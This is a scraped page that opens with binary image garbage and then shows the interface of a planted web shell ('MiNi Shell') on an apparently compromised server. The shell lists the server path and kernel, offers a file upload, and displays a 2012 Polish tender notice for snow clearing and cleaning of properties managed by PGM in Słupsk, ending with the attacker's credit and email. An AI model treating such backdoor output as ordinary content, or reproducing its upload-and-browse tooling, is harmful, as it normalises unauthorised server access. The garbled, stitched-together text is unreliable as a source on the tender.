JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120105/6371-N-2012.html

<p class="kh_header"><b>Słupsk: Usługi zimowego utrzymania terenów zewnętrznych oraz całorocznego utrzymania czystości i porządku na terenach zewnętrznych nieruchomości zarządzanych przez PGM Sp. z o.o.  w Słupsku -  Rejon ulic nr 1 i Rejon ulic nr 2 z podziałem na 2 części</b><br>
<b>Numer ogłoszenia: 6371 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Mieszkaniowej Sp. z o.o. w Słupsku , ul. Tuwima 4, 76-200 Słupsk, woj. pomorskie, tel. (059) 842 82 93, faks (059) 842 80 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pgm.slupsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa spółka prawa handlowego - zarządca nieruchomości.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi zimowego utrzymania terenów zewnętrznych oraz całorocznego utrzymania czystości i porządku na terenach zewnętrznych nieruchomości zarządzanych przez PGM Sp. z o.o.  w Słupsku -  Rejon ulic nr 1 i Rejon ulic nr 2 z podziałem na 2 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie zimowego utrzymania (odśnieżanie i usuwanie śliskości) terenów zewnętrznych nieruchomości (chodników i innych terenów i powierzchni utwardzonych) oraz całorocznego utrzymania czystości i porządku na terenach zewnętrznych nieruchomości będących 100% własnością Miasta Słupsk oraz na terenach zewnętrznych nieruchomości wspólnot mieszkaniowych  zarządzanych przez PGM Sp. z o.o. w Słupsku w rejonach Administracji Wspólnot i Lokali Nr 1,  (AWiL 1) przy ul. Prusa 6, Administracji Wspólnot i Lokali Nr 2 (AWiL 2) przy ul. Niemcewicza 15 oraz Administracji Zasobów Gminnych (AZG) przy Pl. Zwycięstwa 4 Sp. z o.o. w Słupsku  - Rejon ulic nr 1 i Rejon ulic nr 2 z podziałem na 2 części.
2. Szczegółowy opis przedmiotu zamówienia określają: 
a) wzory umów stanowiące załączniki nr 7.1. i 7.2. do SIWZ.
b) zestawienia terenów do sprzątania stanowiące załączniki: nr 8.1. i 8.2. SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju świadczeń</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 17.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane wadium:
a) na część nr 1 w wysokości - 2150 zł, 
b) na część nr 2 w wysokości - 1600 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek posiadania uprawnień do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia. zostanie uznany przez zamawiającego za spełniony jeżeli wykonawca wykaże, że posiada zezwolenia na prowadzenie działalności w zakresie objętym przedmiotem zamówienia tj.:
 a)  zezwolenie na odbieranie odpadów komunalnych od właścicieli nieruchomości wynikające z art. 7 ust. 1 pkt 1 ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach  (Dz. U. z 2005r. Nr 236, poz. 2008 z późn. zm.)
b) zezwolenie na zbieranie i transport odpadów komunalnych na terenie miasta Słupska wydane przez Prezydenta Miasta Słupska na podstawie art. 28 ust. 1 ustawy z dnia  27 kwietnia 2001r. o odpadach (Dz. U. z  2001r. Nr 62 poz. 628 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek posiadania wiedzy i doświadczenia - zostanie uznany przez zamawiającego za spełniony jeżeli wykonawca wykaże że: 
w okresie ostatnich trzech lat przed wszczęciem postępowania  wykonał co najmniej jedną tożsamą usługę polegającą na zimowym utrzymaniu terenów zewnętrznych oraz utrzymaniu czystości na terenach zewnętrznych  nieruchomości o łącznej powierzchni nie mniejszej niż 80.000m2, i której łączna zrealizowana (zafakturowana) wartość liczona do terminu składania ofert jest nie mniejsza  niż 50 000,00 PLN brutto w przypadku składania oferty częściowej na jedną z 2 wybranych części zamówienia  
W  przypadku składania oferty na dwie części zamówienia zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed wszczęciem postępowania  wykonał co najmniej:  jedną tożsamą usługę polegającą na zimowym utrzymaniu terenów zewnętrznych oraz utrzymaniu czystości na terenach zewnętrznych  nieruchomości o łącznej powierzchni nie mniejszej niż 100.000m2 i  której łączna zrealizowana (zafakturowana) wartość liczona do terminu składania ofert jest nie mniejsza  niż 100 000,00 PLN  brutto, albo wykonał co najmniej dwie tożsame usługi polegające na zimowym utrzymaniu terenów zewnętrznych oraz utrzymaniu czystości na terenach zewnętrznych  nieruchomości o łącznej powierzchni nie mniejszej niż 50.000m2  każda i zrealizowanej (zafakturowanej) wartości każdej z tych usług, liczonej do terminu składania ofert, nie mniejsza  niż 50 000,00 PLN brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże że:
a) dysponuje co najmniej: 
-	jednym  pługiem (np. ciągnik z pługiem lub inny pług z napędem mechanicznym) do odśnieżania chodników wjazdów, dróg i placów wewnętrznych, 
-	jedną piaskarką do usuwania śliskości na chodnikach (np. ciągnik z rozrzutnikiem do piasku) 
-	jednym ciągnikiem z przyczepą lub samochodem ciężarowym skrzyniowym do wywozu gruzu, liści i innych nieczystości nietypowych, 
w przypadku składania oferty na jedną z 2 wybranych części zamówienia.

b) W  przypadku składania oferty na dwie części zamówienia, zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje co najmniej: 
- 2 pługami (np. ciągnik z pługiem lub inny pług z napędem mechanicznym) do odśnieżania chodników wjazdów, dróg i placów wewnętrznych, 
-	2 piaskarkami do usuwania śliskości na chodnikach (np. ciągnik z rozrzutnikiem do piasku), 
- jednym ciągnikiem z przyczepą lub samochodem ciężarowym skrzyniowym do wywozu gruzu, liści i innych nieczystości nietypowych, 
(Warunek dysponowania piaskarką zostanie uznany za spełniony również w sytuacji gdy wykonawca wykaże, że dysponuje np. zestawem ciągnik z pługiem i piaskarką).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, że dysponuje co najmniej 1 osobą  odpowiedzialną za nadzorowanie prac licząc oddzielnie na każdą z części zamówienia na którą wykonawca składa ofertę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3)	Warunek dotyczący sytuacji ekonomicznej i finansowej zostanie uznany za spełniony jeżeli wykonawca wykaże, że:
a)	posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej  100.000 złotych (słownie zł : sto tysięcy) w przypadku składania oferty na jedną z  dwóch części zamówienia,
b)	w przypadku składania oferty na dwie  części zamówienia warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej  200.000 złotych (słownie zł: dwieście tysięcy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany Formularz oferty z wykorzystaniem wzoru - załącznik nr 1 do SIWZ
2) Wypełnione i podpisane formularze cenowe - z wykorzystaniem odpowiedniego dla danej części zamówienia, na które wykonawca składa ofertę (załącznik nr 1.1 i/lub załącznik nr 1.2 do SIWZ). 
3) Pełnomocnictwo w przypadku działania wykonawcy przez pełnomocników lub składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.
4) Wykaz tych części zamówienia, których wykonawca zamierza powierzyć podwykonawcą, jeżeli  dotyczy - wg wzoru załącznika nr 6 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pgm.slupsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Mieszkaniowej Sp. z o.o. 
76-200 Słupsk , ul. Tuwima 4, pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2012 godzina 10:00, miejsce: Przedsiębiorstwo Gospodarki Mieszkaniowej Sp. z o.o. 
76-200 Słupsk , ul. Tuwima 4, pokój nr 4 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi zimowego utrzymania terenów zewnętrznych oraz całorocznego utrzymania czystości i porządku na terenach zewnętrznych nieruchomości zarządzanych przez PGM Sp. z o.o. w Słupsku w Rejonie ulic Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie zimowego utrzymania (odśnieżanie i usuwanie śliskości) terenów zewnętrznych nieruchomości (chodników i innych terenów i powierzchni utwardzonych) oraz całorocznego utrzymania czystości i porządku na terenach zewnętrznych nieruchomości będących 100% własnością Miasta Słupsk oraz na terenach zewnętrznych nieruchomości wspólnot mieszkaniowych  zarządzanych przez PGM Sp. z o.o. w Słupsku w rejonach Administracji Wspólnot i Lokali Nr 1,  (AWiL 1) przy ul. Prusa 6, Administracji Wspólnot i Lokali Nr 2 (AWiL 2) przy ul. Niemcewicza 15 oraz Administracji Zasobów Gminnych (AZG) przy Pl. Zwycięstwa 4 Sp. z o.o. w Słupsku  - Rejon ulic nr 1 
Szczegółowy opis i zakres przedmiotu zamówienia dla Części nr 1 określa: wzór umowy  stanowiący załącznik nr 7.1 do SIWZ
Łączna powierzchnia terenów do sprzątania w Części Nr 1 wynosi: 90.226,0m2  
Szczegółowy wykaz nieruchomości oraz ich powierzchnie - określa załącznik Nr  8.1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.60.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 17.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi zimowego utrzymania terenów zewnętrznych oraz całorocznego utrzymania czystości  i porządku na terenach zewnętrznych nieruchomości zarządzanych przez PGM Sp. z o.o. w Słupsku w Rejonie ulic Nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie zimowego utrzymania (odśnieżanie i usuwanie śliskości) terenów zewnętrznych nieruchomości (chodników i innych terenów i powierzchni utwardzonych) oraz całorocznego utrzymania czystości i porządku na terenach zewnętrznych nieruchomości będących 100% własnością Miasta Słupsk oraz na terenach zewnętrznych nieruchomości wspólnot mieszkaniowych  zarządzanych przez PGM Sp. z o.o. w Słupsku w rejonach Administracji Wspólnot i Lokali Nr 1,  (AWiL 1) przy ul. Prusa 6, Administracji Wspólnot i Lokali Nr 2 (AWiL 2) przy ul. Niemcewicza 15 oraz Administracji Zasobów Gminnych (AZG) przy Pl. Zwycięstwa 4 Sp. z o.o. w Słupsku  - Rejon ulic nr 2 
Szczegółowy opis i zakres przedmiotu zamówienia dla Części nr 2 określa: wzór umowy  stanowiący załącznik nr 7.2 do SIWZ
Łączna powierzchnia terenów do sprzątania w Części Nr 2 wynosi: 67.771,30m2  
Szczegółowy wykaz nieruchomości oraz ich powierzchnie - określa załącznik Nr 8.2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.60.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 17.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com